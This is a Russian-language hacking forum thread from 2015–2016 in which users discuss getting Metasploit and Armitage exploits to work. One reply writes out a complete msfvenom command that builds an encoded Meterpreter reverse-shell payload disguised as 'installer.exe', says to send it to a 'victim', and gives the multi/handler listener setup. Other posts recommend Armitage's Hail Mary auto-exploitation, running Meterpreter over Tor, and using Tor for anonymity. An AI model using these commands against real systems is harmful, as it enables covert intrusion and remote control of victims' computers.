ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

15.05.2015, 20:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 5669
Репутация:
5
|
|
недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает
вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
|
|
|
|

15.05.2015, 21:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от 0x777
0x777 said:
↑
недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает
вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
так бак трак или kali. Плюнь в лицо кто тебе сказал что бесплатная версия не работает. Думаю тут мало у кого есть 5000 на покупку его. метасплоит это лишь удобный запуск эксплоита.
|
|
|
|

15.05.2015, 21:24
|
|
Guest
Сообщений: n/a
Провел на форуме: 5669
Репутация:
5
|
|
ну типа все пашет, но заюзать дырку не дает, может канешно и дырка на цевой машине запатчена, открытый порт это же еще не дырка )
но вот стал перед делемой штормить ли дальше метасплоит или делать ручками
мучаю также армитаж, вроде он все находит, говорит дыры есть и не одна но ни один эксплоит не срабатывает ((
вот и хотелось бы услышать что ктото реально заюзал из этих сборок чтото и что все пашет
|
|
|
|

19.05.2015, 12:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 11777
Репутация:
1
|
|
Сообщение от 0x777
0x777 said:
↑
ну типа все пашет, но заюзать дырку не дает, может канешно и дырка на цевой машине запатчена, открытый порт это же еще не дырка )
но вот стал перед делемой штормить ли дальше метасплоит или делать ручками
мучаю также армитаж, вроде он все находит, говорит дыры есть и не одна но ни один эксплоит не срабатывает ((
вот и хотелось бы услышать что ктото реально заюзал из этих сборок чтото и что все пашет
Все отлично работает на бесплатнной версии.
Надо просто прямые руки
|
|
|
|

22.05.2015, 17:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 547
Репутация:
0
|
|
Можешь на первое время (да и в целом) облегчить себе задачу - накатить GUI к Metasploit Framework+Nmap - Armitage.
Тогда весь процесс можно свести к следующему алгоритму:
0. Hosts -> Add hosts.
1. Scan.
2. Attacks -> Find Attacks.
3. Attacks ->Hail Mary
.SpoilerTarget" type="button">Spoiler
Если речь идет о обговоренном заранее пентесте, иначе использование этого модуля приведет к запуску всех подходящих эксплойтах из шага "2", что не очень хорошо в плане анонимности.
4. Смотрим результат.
Могу выложить с картиночками из личной практики. В принципе для того, чтобы потестить на устойчивость к паблику - этого хватит.
Так же здесь можно проверить на наличие всяких дефолтных учеток
.SpoilerTarget" type="button">Spoiler
а-ля lbacsys/lbacsys в Oracle Database.
Но это все ближе непосредственно к сетевым сервисам. Если тебя интересует web - то есть много других инструментов.
|
|
|
|

26.05.2015, 09:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 288
Репутация:
0
|
|
Сообщение от 0x777
0x777 said:
↑
недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает
вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
Дело действительно заключается в ровности рук, gosmir верное дело подсказал юзай Armitage он сильно упрощает и без того не сложный процесс.
З.Ы. Сам юзал его по началу когда столкнулся с подобной проблемой.
|
|
|
|

09.06.2015, 21:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 10237
Репутация:
0
|
|
Господа, дабы не плодить тем, не подскажете по метерпретеру? Как-то мимо меня это прошло..
Есть ли возможность настройки/написания скрипта, который бы выполнялся для метепретера автоматически после бэкконекта? Предположим, я хочу запустить powershell скрипт с помощью команды shell. Или
вывести в консоль(в БД) инфу о системе(sysinfo)? А потом, допустим, создать директорию(mkdir) и перезагрузится? Т.е. хотелось бы оперировать именно командами метерпретерами с небольшой своей логикой. И все это автоматически.. Заранее спасибо.
ПС могу рассказать как юзать метерпретер через тор.
|
|
|
|

23.11.2016, 00:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 2776
Репутация:
0
|
|
Сообщение от 0x777
0x777 said:
↑
недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает
вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
Перед тем как начать работу в Metasploit :
- надо разобраться в exploit ;
- проверить LHOST (прописать ifconfig );
- LPORT 8080 (443, 6666) порт очень важен ;
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.73.128 LPORT=4444 -e x86/shikata_ga_nai -i 10 -x /root/Desktop/installer.exe -f exe > /root/Desktop/installer.exe
отправить файл на VICTIM OS (жертва)
msfconsole
use exploit/multi/handler
set Payload windows/meteroreter/reverse_tcp
set LHOST xxx.xxx.x.x
set LPORT 8080
exploit
|
|
|
|

01.12.2016, 16:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 12232
Репутация:
0
|
|
Один и очень важный аспект это белый ip + tor, в локалке можно и так плющить)
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|